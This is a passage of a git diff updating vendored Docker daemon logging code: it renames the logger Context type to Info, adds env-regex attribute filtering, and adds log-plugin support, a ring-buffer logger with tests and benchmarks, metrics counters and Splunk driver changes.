subscriber -func (w *RotateFileWriter) NotifyRotate() chan interface{} { - return w.notifyRotate.Subscribe() -} - -//NotifyRotateEvict removes the specified subscriber from receiving any more messages. -func (w *RotateFileWriter) NotifyRotateEvict(sub chan interface{}) { - w.notifyRotate.Evict(sub) -} - -// Close closes underlying file and signals all readers to stop. -func (w *RotateFileWriter) Close() error { - return w.f.Close() -} diff --git a/vendor/github.com/docker/docker/daemon/logger/context.go b/vendor/github.com/docker/docker/daemon/logger/loginfo.go similarity index 54% rename from vendor/github.com/docker/docker/daemon/logger/context.go rename to vendor/github.com/docker/docker/daemon/logger/loginfo.go index 085ab01a18..4c48235f5c 100644 --- a/vendor/github.com/docker/docker/daemon/logger/context.go +++ b/vendor/github.com/docker/docker/daemon/logger/loginfo.go @@ -1,14 +1,15 @@ -package logger +package logger // import "github.com/docker/docker/daemon/logger" import ( "fmt" "os" + "regexp" "strings" "time" ) -// Context provides enough information for a logging driver to do its function. -type Context struct { +// Info provides enough information for a logging driver to do its function. +type Info struct { Config map[string]string ContainerID string ContainerName string @@ -26,12 +27,12 @@ type Context struct { // ExtraAttributes returns the user-defined extra attributes (labels, // environment variables) in key-value format. This can be used by log drivers // that support metadata to add more context to a log. -func (ctx *Context) ExtraAttributes(keyMod func(string) string) map[string]string { +func (info *Info) ExtraAttributes(keyMod func(string) string) (map[string]string, error) { extra := make(map[string]string) - labels, ok := ctx.Config["labels"] + labels, ok := info.Config["labels"] if ok && len(labels) > 0 { for _, l := range strings.Split(labels, ",") { - if v, ok := ctx.ContainerLabels[l]; ok { + if v, ok := info.ContainerLabels[l]; ok { if keyMod != nil { l = keyMod(l) } @@ -40,14 +41,15 @@ func (ctx *Context) ExtraAttributes(keyMod func(string) string) map[string]strin } } - env, ok := ctx.Config["env"] - if ok && len(env) > 0 { - envMapping := make(map[string]string) - for _, e := range ctx.ContainerEnv { - if kv := strings.SplitN(e, "=", 2); len(kv) == 2 { - envMapping[kv[0]] = kv[1] - } + envMapping := make(map[string]string) + for _, e := range info.ContainerEnv { + if kv := strings.SplitN(e, "=", 2); len(kv) == 2 { + envMapping[kv[0]] = kv[1] } + } + + env, ok := info.Config["env"] + if ok && len(env) > 0 { for _, l := range strings.Split(env, ",") { if v, ok := envMapping[l]; ok { if keyMod != nil { @@ -58,11 +60,27 @@ func (ctx *Context) ExtraAttributes(keyMod func(string) string) map[string]strin } } - return extra + envRegex, ok := info.Config["env-regex"] + if ok && len(envRegex) > 0 { + re, err := regexp.Compile(envRegex) + if err != nil { + return nil, err + } + for k, v := range envMapping { + if re.MatchString(k) { + if keyMod != nil { + k = keyMod(k) + } + extra[k] = v + } + } + } + + return extra, nil } // Hostname returns the hostname from the underlying OS. -func (ctx *Context) Hostname() (string, error) { +func (info *Info) Hostname() (string, error) { hostname, err := os.Hostname() if err != nil { return "", fmt.Errorf("logger: can not resolve hostname: %v", err) @@ -73,39 +91,39 @@ func (ctx *Context) Hostname() (string, error) { // Command returns the command that the container being logged was // started with. The Entrypoint is prepended to the container // arguments. -func (ctx *Context) Command() string { - terms := []string{ctx.ContainerEntrypoint} - terms = append(terms, ctx.ContainerArgs...) +func (info *Info) Command() string { + terms := []string{info.ContainerEntrypoint} + terms = append(terms, info.ContainerArgs...) command := strings.Join(terms, " ") return command } // ID Returns the Container ID shortened to 12 characters. -func (ctx *Context) ID() string { - return ctx.ContainerID[:12] +func (info *Info) ID() string { + return info.ContainerID[:12] } // FullID is an alias of ContainerID. -func (ctx *Context) FullID() string { - return ctx.ContainerID +func (info *Info) FullID() string { + return info.ContainerID } // Name returns the ContainerName without a preceding '/'. -func (ctx *Context) Name() string { - return ctx.ContainerName[1:] +func (info *Info) Name() string { + return strings.TrimPrefix(info.ContainerName, "/") } // ImageID returns the ContainerImageID shortened to 12 characters. -func (ctx *Context) ImageID() string { - return ctx.ContainerImageID[:12] +func (info *Info) ImageID() string { + return info.ContainerImageID[:12] } // ImageFullID is an alias of ContainerImageID. -func (ctx *Context) ImageFullID() string { - return ctx.ContainerImageID +func (info *Info) ImageFullID() string { + return info.ContainerImageID } // ImageName is an alias of ContainerImageName -func (ctx *Context) ImageName() string { - return ctx.ContainerImageName +func (info *Info) ImageName() string { + return info.ContainerImageName } diff --git a/vendor/github.com/docker/docker/daemon/logger/metrics.go b/vendor/github.com/docker/docker/daemon/logger/metrics.go new file mode 100644 index 0000000000..b7dfd38ec2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/metrics.go @@ -0,0 +1,21 @@ +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "github.com/docker/go-metrics" +) + +var ( + logWritesFailedCount metrics.Counter + logReadsFailedCount metrics.Counter + totalPartialLogs metrics.Counter +) + +func init() { + loggerMetrics := metrics.NewNamespace("logger", "", nil) + + logWritesFailedCount = loggerMetrics.NewCounter("log_write_operations_failed", "Number of log write operations that failed") + logReadsFailedCount = loggerMetrics.NewCounter("log_read_operations_failed", "Number of log reads from container stdio that failed") + totalPartialLogs = loggerMetrics.NewCounter("log_entries_size_greater_than_buffer", "Number of log entries which are larger than the log buffer") + + metrics.Register(loggerMetrics) +} diff --git a/vendor/github.com/docker/docker/daemon/logger/plugin.go b/vendor/github.com/docker/docker/daemon/logger/plugin.go new file mode 100644 index 0000000000..c66540ce52 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/plugin.go @@ -0,0 +1,116 @@ +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "fmt" + "io" + "os" + "path/filepath" + + "github.com/docker/docker/api/types/plugins/logdriver" + "github.com/docker/docker/errdefs" + getter "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" + "github.com/docker/docker/pkg/stringid" + "github.com/pkg/errors" +) + +var pluginGetter getter.PluginGetter + +const extName = "LogDriver" + +// logPlugin defines the available functions that logging plugins must implement. +type logPlugin interface { + StartLogging(streamPath string, info Info) (err error) + StopLogging(streamPath string) (err error) + Capabilities() (cap Capability, err error) + ReadLogs(info Info, config ReadConfig) (stream io.ReadCloser, err error) +} + +// RegisterPluginGetter sets the plugingetter +func RegisterPluginGetter(plugingetter getter.PluginGetter) { + pluginGetter = plugingetter +} + +// GetDriver returns a logging driver by its name. +// If the driver is empty, it looks for the local driver. +func getPlugin(name string, mode int) (Creator, error) { + p, err := pluginGetter.Get(name, extName, mode) + if err != nil { + return nil, fmt.Errorf("error looking up logging plugin %s: %v", name, err) + } + + client, err := makePluginClient(p) + if err != nil { + return nil, err + } + return makePluginCreator(name, client, p.ScopedPath), nil +} + +func makePluginClient(p getter.CompatPlugin) (logPlugin, error) { + if pc, ok := p.(getter.PluginWithV1Client); ok { + return &logPluginProxy{pc.Client()}, nil + } + pa, ok := p.(getter.PluginAddr) + if !ok { + return nil, errdefs.System(errors.Errorf("got unknown plugin type %T", p)) + } + + if pa.Protocol() != plugins.ProtocolSchemeHTTPV1 { + return nil, errors.Errorf("plugin protocol not supported: %s", p) + } + + addr := pa.Addr() + c, err := plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, pa.Timeout()) + if err != nil { + return nil, errors.Wrap(err, "error making plugin client") + } + return &logPluginProxy{c}, nil +} + +func makePluginCreator(name string, l logPlugin, scopePath func(s string) string) Creator { + return func(logCtx Info) (logger Logger, err error) { + defer func() { + if err != nil { + pluginGetter.Get(name, extName, getter.Release) + } + }() + + unscopedPath := filepath.Join("/", "run", "docker", "logging") + logRoot := scopePath(unscopedPath) + if err := os.MkdirAll(logRoot, 0700); err != nil { + return nil, err + } + + id := stringid.GenerateNonCryptoID() + a := &pluginAdapter{ + driverName: name, + id: id, + plugin: l, + fifoPath: filepath.Join(logRoot, id), + logInfo: logCtx, + } + + cap, err := a.plugin.Capabilities() + if err == nil { + a.capabilities = cap + } + + stream, err := openPluginStream(a) + if err != nil { + return nil, err + } + + a.stream = stream + a.enc = logdriver.NewLogEntryEncoder(a.stream) + + if err := l.StartLogging(filepath.Join(unscopedPath, id), logCtx); err != nil { + return nil, errors.Wrapf(err, "error creating logger") + } + + if cap.ReadLogs { + return &pluginAdapterWithRead{a}, nil + } + + return a, nil + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/plugin_unix.go b/vendor/github.com/docker/docker/daemon/logger/plugin_unix.go new file mode 100644 index 0000000000..e9a16af9b1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/plugin_unix.go @@ -0,0 +1,23 @@ +// +build linux freebsd + +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "context" + "io" + + "github.com/containerd/fifo" + "github.com/pkg/errors" + "golang.org/x/sys/unix" +) + +func openPluginStream(a *pluginAdapter) (io.WriteCloser, error) { + // Make sure to also open with read (in addition to write) to avoid borken pipe errors on plugin failure. + // It is up to the plugin to keep track of pipes that it should re-attach to, however. + // If the plugin doesn't open for reads, then the container will block once the pipe is full. + f, err := fifo.OpenFifo(context.Background(), a.fifoPath, unix.O_RDWR|unix.O_CREAT|unix.O_NONBLOCK, 0700) + if err != nil { + return nil, errors.Wrapf(err, "error creating i/o pipe for log plugin: %s", a.Name()) + } + return f, nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/plugin_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/plugin_unsupported.go new file mode 100644 index 0000000000..2ad47cc077 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/plugin_unsupported.go @@ -0,0 +1,12 @@ +// +build !linux,!freebsd + +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "errors" + "io" +) + +func openPluginStream(a *pluginAdapter) (io.WriteCloser, error) { + return nil, errors.New("log plugin not supported") +} diff --git a/vendor/github.com/docker/docker/daemon/logger/proxy.go b/vendor/github.com/docker/docker/daemon/logger/proxy.go new file mode 100644 index 0000000000..4a1c778108 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/proxy.go @@ -0,0 +1,107 @@ +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "errors" + "io" +) + +type client interface { + Call(string, interface{}, interface{}) error + Stream(string, interface{}) (io.ReadCloser, error) +} + +type logPluginProxy struct { + client +} + +type logPluginProxyStartLoggingRequest struct { + File string + Info Info +} + +type logPluginProxyStartLoggingResponse struct { + Err string +} + +func (pp *logPluginProxy) StartLogging(file string, info Info) (err error) { + var ( + req logPluginProxyStartLoggingRequest + ret logPluginProxyStartLoggingResponse + ) + + req.File = file + req.Info = info + if err = pp.Call("LogDriver.StartLogging", req, &ret); err != nil { + return + } + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type logPluginProxyStopLoggingRequest struct { + File string +} + +type logPluginProxyStopLoggingResponse struct { + Err string +} + +func (pp *logPluginProxy) StopLogging(file string) (err error) { + var ( + req logPluginProxyStopLoggingRequest + ret logPluginProxyStopLoggingResponse + ) + + req.File = file + if err = pp.Call("LogDriver.StopLogging", req, &ret); err != nil { + return + } + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type logPluginProxyCapabilitiesResponse struct { + Cap Capability + Err string +} + +func (pp *logPluginProxy) Capabilities() (cap Capability, err error) { + var ( + ret logPluginProxyCapabilitiesResponse + ) + + if err = pp.Call("LogDriver.Capabilities", nil, &ret); err != nil { + return + } + + cap = ret.Cap + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type logPluginProxyReadLogsRequest struct { + Info Info + Config ReadConfig +} + +func (pp *logPluginProxy) ReadLogs(info Info, config ReadConfig) (stream io.ReadCloser, err error) { + var ( + req logPluginProxyReadLogsRequest + ) + + req.Info = info + req.Config = config + return pp.Stream("LogDriver.ReadLogs", req) +} diff --git a/vendor/github.com/docker/docker/daemon/logger/ring.go b/vendor/github.com/docker/docker/daemon/logger/ring.go new file mode 100644 index 0000000000..c675c1e83c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/ring.go @@ -0,0 +1,223 @@ +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "errors" + "sync" + "sync/atomic" + + "github.com/sirupsen/logrus" +) + +const ( + defaultRingMaxSize = 1e6 // 1MB +) + +// RingLogger is a ring buffer that implements the Logger interface. +// This is used when lossy logging is OK. +type RingLogger struct { + buffer *messageRing + l Logger + logInfo Info + closeFlag int32 +} + +type ringWithReader struct { + *RingLogger +} + +func (r *ringWithReader) ReadLogs(cfg ReadConfig) *LogWatcher { + reader, ok := r.l.(LogReader) + if !ok { + // something is wrong if we get here + panic("expected log reader") + } + return reader.ReadLogs(cfg) +} + +func newRingLogger(driver Logger, logInfo Info, maxSize int64) *RingLogger { + l := &RingLogger{ + buffer: newRing(maxSize), + l: driver, + logInfo: logInfo, + } + go l.run() + return l +} + +// NewRingLogger creates a new Logger that is implemented as a RingBuffer wrapping +// the passed in logger. +func NewRingLogger(driver Logger, logInfo Info, maxSize int64) Logger { + if maxSize < 0 { + maxSize = defaultRingMaxSize + } + l := newRingLogger(driver, logInfo, maxSize) + if _, ok := driver.(LogReader); ok { + return &ringWithReader{l} + } + return l +} + +// Log queues messages into the ring buffer +func (r *RingLogger) Log(msg *Message) error { + if r.closed() { + return errClosed + } + return r.buffer.Enqueue(msg) +} + +// Name returns the name of the underlying logger +func (r *RingLogger) Name() string { + return r.l.Name() +} + +func (r *RingLogger) closed() bool { + return atomic.LoadInt32(&r.closeFlag) == 1 +} + +func (r *RingLogger) setClosed() { + atomic.StoreInt32(&r.closeFlag, 1) +} + +// Close closes the logger +func (r *RingLogger) Close() error { + r.setClosed() + r.buffer.Close() + // empty out the queue + var logErr bool + for _, msg := range r.buffer.Drain() { + if logErr { + // some error logging a previous message, so re-insert to message pool + // and assume log driver is hosed + PutMessage(msg) + continue + } + + if err := r.l.Log(msg); err != nil { + logrus.WithField("driver", r.l.Name()). + WithField("container", r.logInfo.ContainerID). + WithError(err). + Errorf("Error writing log message") + logErr = true + } + } + return r.l.Close() +} + +// run consumes messages from the ring buffer and forwards them to the underling +// logger. +// This is run in a goroutine when the RingLogger is created +func (r *RingLogger) run() { + for { + if r.closed() { + return + } + msg, err := r.buffer.Dequeue() + if err != nil { + // buffer is closed + return + } + if err := r.l.Log(msg); err != nil { + logrus.WithField("driver", r.l.Name()). + WithField("container", r.logInfo.ContainerID). + WithError(err). + Errorf("Error writing log message") + } + } +} + +type messageRing struct { + mu sync.Mutex + // signals callers of `Dequeue` to wake up either on `Close` or when a new `Message` is added + wait *sync.Cond + + sizeBytes int64 // current buffer size + maxBytes int64 // max buffer size size + queue []*Message + closed bool +} + +func newRing(maxBytes int64) *messageRing { + queueSize := 1000 + if maxBytes == 0 || maxBytes == 1 { + // With 0 or 1 max byte size, the maximum size of the queue would only ever be 1 + // message long. + queueSize = 1 + } + + r := &messageRing{queue: make([]*Message, 0, queueSize), maxBytes: maxBytes} + r.wait = sync.NewCond(&r.mu) + return r +} + +// Enqueue adds a message to the buffer queue +// If the message is too big for the buffer it drops the new message. +// If there are no messages in the queue and the message is still too big, it adds the message anyway. +func (r *messageRing) Enqueue(m *Message) error { + mSize := int64(len(m.Line)) + + r.mu.Lock() + if r.closed { + r.mu.Unlock() + return errClosed + } + if mSize+r.sizeBytes > r.maxBytes && len(r.queue) > 0 { + r.wait.Signal() + r.mu.Unlock() + return nil + } + + r.queue = append(r.queue, m) + r.sizeBytes += mSize + r.wait.Signal() + r.mu.Unlock() + return nil +} + +// Dequeue pulls a message off the queue +// If there are no messages, it waits for one. +// If the buffer is closed, it will return immediately. +func (r *messageRing) Dequeue() (*Message, error) { + r.mu.Lock() + for len(r.queue) == 0 && !r.closed { + r.wait.Wait() + } + + if r.closed { + r.mu.Unlock() + return nil, errClosed + } + + msg := r.queue[0] + r.queue = r.queue[1:] + r.sizeBytes -= int64(len(msg.Line)) + r.mu.Unlock() + return msg, nil +} + +var errClosed = errors.New("closed") + +// Close closes the buffer ensuring no new messages can be added. +// Any callers waiting to dequeue a message will be woken up. +func (r *messageRing) Close() { + r.mu.Lock() + if r.closed { + r.mu.Unlock() + return + } + + r.closed = true + r.wait.Broadcast() + r.mu.Unlock() +} + +// Drain drains all messages from the queue. +// This can be used after `Close()` to get any remaining messages that were in queue. +func (r *messageRing) Drain() []*Message { + r.mu.Lock() + ls := make([]*Message, 0, len(r.queue)) + ls = append(ls, r.queue...) + r.sizeBytes = 0 + r.queue = r.queue[:0] + r.mu.Unlock() + return ls +} diff --git a/vendor/github.com/docker/docker/daemon/logger/ring_test.go b/vendor/github.com/docker/docker/daemon/logger/ring_test.go new file mode 100644 index 0000000000..a2289cc667 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/ring_test.go @@ -0,0 +1,299 @@ +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "context" + "strconv" + "testing" + "time" +) + +type mockLogger struct{ c chan *Message } + +func (l *mockLogger) Log(msg *Message) error { + l.c <- msg + return nil +} + +func (l *mockLogger) Name() string { + return "mock" +} + +func (l *mockLogger) Close() error { + return nil +} + +func TestRingLogger(t *testing.T) { + mockLog := &mockLogger{make(chan *Message)} // no buffer on this channel + ring := newRingLogger(mockLog, Info{}, 1) + defer ring.setClosed() + + // this should never block + ring.Log(&Message{Line: []byte("1")}) + ring.Log(&Message{Line: []byte("2")}) + ring.Log(&Message{Line: []byte("3")}) + + select { + case msg := <-mockLog.c: + if string(msg.Line) != "1" { + t.Fatalf("got unexpected msg: %q", string(msg.Line)) + } + case <-time.After(100 * time.Millisecond): + t.Fatal("timeout reading log message") + } + + select { + case msg := <-mockLog.c: + t.Fatalf("expected no more messages in the queue, got: %q", string(msg.Line)) + default: + } +} + +func TestRingCap(t *testing.T) { + r := newRing(5) + for i := 0; i < 10; i++ { + // queue messages with "0" to "10" + // the "5" to "10" messages should be dropped since we only allow 5 bytes in the buffer + if err := r.Enqueue(&Message{Line: []byte(strconv.Itoa(i))}); err != nil { + t.Fatal(err) + } + } + + // should have messages in the queue for "0" to "4" + for i := 0; i < 5; i++ { + m, err := r.Dequeue() + if err != nil { + t.Fatal(err) + } + if string(m.Line) != strconv.Itoa(i) { + t.Fatalf("got unexpected message for iter %d: %s", i, string(m.Line)) + } + } + + // queue a message that's bigger than the buffer cap + if err := r.Enqueue(&Message{Line: []byte("hello world")}); err != nil { + t.Fatal(err) + } + + // queue another message that's bigger than the buffer cap + if err := r.Enqueue(&Message{Line: []byte("eat a banana")}); err != nil { + t.Fatal(err) + } + + m, err := r.Dequeue() + if err != nil { + t.Fatal(err) + } + if string(m.Line) != "hello world" { + t.Fatalf("got unexpected message: %s", string(m.Line)) + } + if len(r.queue) != 0 { + t.Fatalf("expected queue to be empty, got: %d", len(r.queue)) + } +} + +func TestRingClose(t *testing.T) { + r := newRing(1) + if err := r.Enqueue(&Message{Line: []byte("hello")}); err != nil { + t.Fatal(err) + } + r.Close() + if err := r.Enqueue(&Message{}); err != errClosed { + t.Fatalf("expected errClosed, got: %v", err) + } + if len(r.queue) != 1 { + t.Fatal("expected empty queue") + } + if m, err := r.Dequeue(); err == nil || m != nil { + t.Fatal("expected err on Dequeue after close") + } + + ls := r.Drain() + if len(ls) != 1 { + t.Fatalf("expected one message: %v", ls) + } + if string(ls[0].Line) != "hello" { + t.Fatalf("got unexpected message: %s", string(ls[0].Line)) + } +} + +func TestRingDrain(t *testing.T) { + r := newRing(5) + for i := 0; i < 5; i++ { + if err := r.Enqueue(&Message{Line: []byte(strconv.Itoa(i))}); err != nil { + t.Fatal(err) + } + } + + ls := r.Drain() + if len(ls) != 5 { + t.Fatal("got unexpected length after drain") + } + + for i := 0; i < 5; i++ { + if string(ls[i].Line) != strconv.Itoa(i) { + t.Fatalf("got unexpected message at position %d: %s", i, string(ls[i].Line)) + } + } + if r.sizeBytes != 0 { + t.Fatalf("expected buffer size to be 0 after drain, got: %d", r.sizeBytes) + } + + ls = r.Drain() + if len(ls) != 0 { + t.Fatalf("expected 0 messages on 2nd drain: %v", ls) + } + +} + +type nopLogger struct{} + +func (nopLogger) Name() string { return "nopLogger" } +func (nopLogger) Close() error { return nil } +func (nopLogger) Log(*Message) error { return nil } + +func BenchmarkRingLoggerThroughputNoReceiver(b *testing.B) { + mockLog := &mockLogger{make(chan *Message)} + defer mockLog.Close() + l := NewRingLogger(mockLog, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkRingLoggerThroughputWithReceiverDelay0(b *testing.B) { + l := NewRingLogger(nopLogger{}, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} + +func consumeWithDelay(delay time.Duration, c <-chan *Message) (cancel func()) { + started := make(chan struct{}) + ctx, cancel := context.WithCancel(context.Background()) + go func() { + close(started) + ticker := time.NewTicker(delay) + for range ticker.C { + select { + case <-ctx.Done(): + ticker.Stop() + return + case <-c: + } + } + }() + <-started + return cancel +} + +func BenchmarkRingLoggerThroughputConsumeDelay1(b *testing.B) { + mockLog := &mockLogger{make(chan *Message)} + defer mockLog.Close() + l := NewRingLogger(mockLog, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + cancel := consumeWithDelay(1*time.Millisecond, mockLog.c) + defer cancel() + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkRingLoggerThroughputConsumeDelay10(b *testing.B) { + mockLog := &mockLogger{make(chan *Message)} + defer mockLog.Close() + l := NewRingLogger(mockLog, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + cancel := consumeWithDelay(10*time.Millisecond, mockLog.c) + defer cancel() + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkRingLoggerThroughputConsumeDelay50(b *testing.B) { + mockLog := &mockLogger{make(chan *Message)} + defer mockLog.Close() + l := NewRingLogger(mockLog, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + cancel := consumeWithDelay(50*time.Millisecond, mockLog.c) + defer cancel() + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkRingLoggerThroughputConsumeDelay100(b *testing.B) { + mockLog := &mockLogger{make(chan *Message)} + defer mockLog.Close() + l := NewRingLogger(mockLog, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + cancel := consumeWithDelay(100*time.Millisecond, mockLog.c) + defer cancel() + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkRingLoggerThroughputConsumeDelay300(b *testing.B) { + mockLog := &mockLogger{make(chan *Message)} + defer mockLog.Close() + l := NewRingLogger(mockLog, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + cancel := consumeWithDelay(300*time.Millisecond, mockLog.c) + defer cancel() + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkRingLoggerThroughputConsumeDelay500(b *testing.B) { + mockLog := &mockLogger{make(chan *Message)} + defer mockLog.Close() + l := NewRingLogger(mockLog, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + cancel := consumeWithDelay(500*time.Millisecond, mockLog.c) + defer cancel() + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go index f85832681a..8756ffa3b2 100644 --- a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go +++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go @@ -1,10 +1,11 @@ // Package splunk provides the log driver for forwarding server logs to // Splunk HTTP Event Collector endpoint. -package splunk +package splunk // import "github.com/docker/docker/daemon/logger/splunk" import ( "bytes" "compress/gzip" + "context" "crypto/tls" "crypto/x509" "encoding/json" @@ -15,13 +16,15 @@ import ( "net/url" "os" "strconv" + "strings" "sync" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/logger" "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/pkg/pools" "github.com/docker/docker/pkg/urlutil" + "github.com/sirupsen/logrus" ) const ( @@ -39,6 +42,7 @@ const ( splunkGzipCompressionKey = "splunk-gzip" splunkGzipCompressionLevelKey = "splunk-gzip-level" envKey = "env" + envRegexKey = "env-regex" labelsKey = "labels" tagKey = "tag" ) @@ -52,6 +56,8 @@ const ( defaultBufferMaximum = 10 * defaultPostMessagesBatchSize // Number of messages allowed to be queued in the channel defaultStreamChannelSize = 4 * defaultPostMessagesBatchSize + // maxResponseSize is the max amount that will be read from an http response + maxResponseSize = 1024 ) const ( @@ -61,6 +67,8 @@ const ( envVarStreamChannelSize = "SPLUNK_LOGGING_DRIVER_CHANNEL_SIZE" ) +var batchSendTimeout = 30 * time.Second + type splunkLoggerInterface interface { logger.Logger worker() @@ -140,20 +148,20 @@ func init() { } // New creates splunk logger driver using configuration passed in context -func New(ctx logger.Context) (logger.Logger, error) { - hostname, err := ctx.Hostname() +func New(info logger.Info) (logger.Logger, error) { + hostname, err := info.Hostname() if err != nil { return nil, fmt.Errorf("%s: cannot access hostname to set source field", driverName) } // Parse and validate Splunk URL - splunkURL, err := parseURL(ctx) + splunkURL, err := parseURL(info) if err != nil { return nil, err } // Splunk Token is required parameter - splunkToken, ok := ctx.Config[splunkTokenKey] + splunkToken, ok := info.Config[splunkTokenKey] if !ok { return nil, fmt.Errorf("%s: %s is expected", driverName, splunkTokenKey) } @@ -162,7 +170,7 @@ func New(ctx logger.Context) (logger.Logger, error) { // Splunk is using autogenerated certificates by default, // allow users to trust them with skipping verification - if insecureSkipVerifyStr, ok := ctx.Config[splunkInsecureSkipVerifyKey]; ok { + if insecureSkipVerifyStr, ok := info.Config[splunkInsecureSkipVerifyKey]; ok { insecureSkipVerify, err := strconv.ParseBool(insecureSkipVerifyStr) if err != nil { return nil, err @@ -171,7 +179,7 @@ func New(ctx logger.Context) (logger.Logger, error) { } // If path to the root certificate is provided - load it - if caPath, ok := ctx.Config[splunkCAPathKey]; ok { + if caPath, ok := info.Config[splunkCAPathKey]; ok { caCert, err := ioutil.ReadFile(caPath) if err != nil { return nil, err @@ -181,12 +189,12 @@ func New(ctx logger.Context) (logger.Logger, error) { tlsConfig.RootCAs = caPool } - if caName, ok := ctx.Config[splunkCANameKey]; ok { + if caName, ok := info.Config[splunkCANameKey]; ok { tlsConfig.ServerName = caName } gzipCompression := false - if gzipCompressionStr, ok := ctx.Config[splunkGzipCompressionKey]; ok { + if gzipCompressionStr, ok := info.Config[splunkGzipCompressionKey]; ok { gzipCompression, err = strconv.ParseBool(gzipCompressionStr) if err != nil { return nil, err @@ -194,7 +202,7 @@ func New(ctx logger.Context) (logger.Logger, error) { } gzipCompressionLevel := gzip.DefaultCompression - if gzipCompressionLevelStr, ok := ctx.Config[splunkGzipCompressionLevelKey]; ok { + if gzipCompressionLevelStr, ok := info.Config[splunkGzipCompressionLevelKey]; ok { var err error gzipCompressionLevel64, err := strconv.ParseInt(gzipCompressionLevelStr, 10, 32) if err != nil { @@ -202,7 +210,7 @@ func New(ctx logger.Context) (logger.Logger, error) { } gzipCompressionLevel = int(gzipCompressionLevel64) if gzipCompressionLevel < gzip.DefaultCompression || gzipCompressionLevel > gzip.BestCompression { - err := fmt.Errorf("Not supported level '%s' for %s (supported values between %d and %d).", + err := fmt.Errorf("not supported level '%s' for %s (supported values between %d and %d)", gzipCompressionLevelStr, splunkGzipCompressionLevelKey, gzip.DefaultCompression, gzip.BestCompression) return nil, err } @@ -210,14 +218,15 @@ func New(ctx logger.Context) (logger.Logger, error) { transport := &http.Transport{ TLSClientConfig: tlsConfig, + Proxy: http.ProxyFromEnvironment, } client := &http.Client{ Transport: transport, } - source := ctx.Config[splunkSourceKey] - sourceType := ctx.Config[splunkSourceTypeKey] - index := ctx.Config[splunkIndexKey] + source := info.Config[splunkSourceKey] + sourceType := info.Config[splunkSourceTypeKey] + index := info.Config[splunkIndexKey] var nullMessage = &splunkMessage{ Host: hostname, @@ -228,14 +237,17 @@ func New(ctx logger.Context) (logger.Logger, error) { // Allow user to remove tag from the messages by setting tag to empty string tag := "" - if tagTemplate, ok := ctx.Config[tagKey]; !ok || tagTemplate != "" { - tag, err = loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + if tagTemplate, ok := info.Config[tagKey]; !ok || tagTemplate != "" { + tag, err = loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate) if err != nil { return nil, err } } - attrs := ctx.ExtraAttributes(nil) + attrs, err := info.ExtraAttributes(nil) + if err != nil { + return nil, err + } var ( postMessagesFrequency = getAdvancedOptionDuration(envVarPostMessagesFrequency, defaultPostMessagesFrequency) @@ -260,7 +272,7 @@ func New(ctx logger.Context) (logger.Logger, error) { // By default we verify connection, but we allow use to skip that verifyConnection := true - if verifyConnectionStr, ok := ctx.Config[splunkVerifyConnectionKey]; ok { + if verifyConnectionStr, ok := info.Config[splunkVerifyConnectionKey]; ok { var err error verifyConnection, err = strconv.ParseBool(verifyConnectionStr) if err != nil { @@ -275,7 +287,7 @@ func New(ctx logger.Context) (logger.Logger, error) { } var splunkFormat string - if splunkFormatParsed, ok := ctx.Config[splunkFormatKey]; 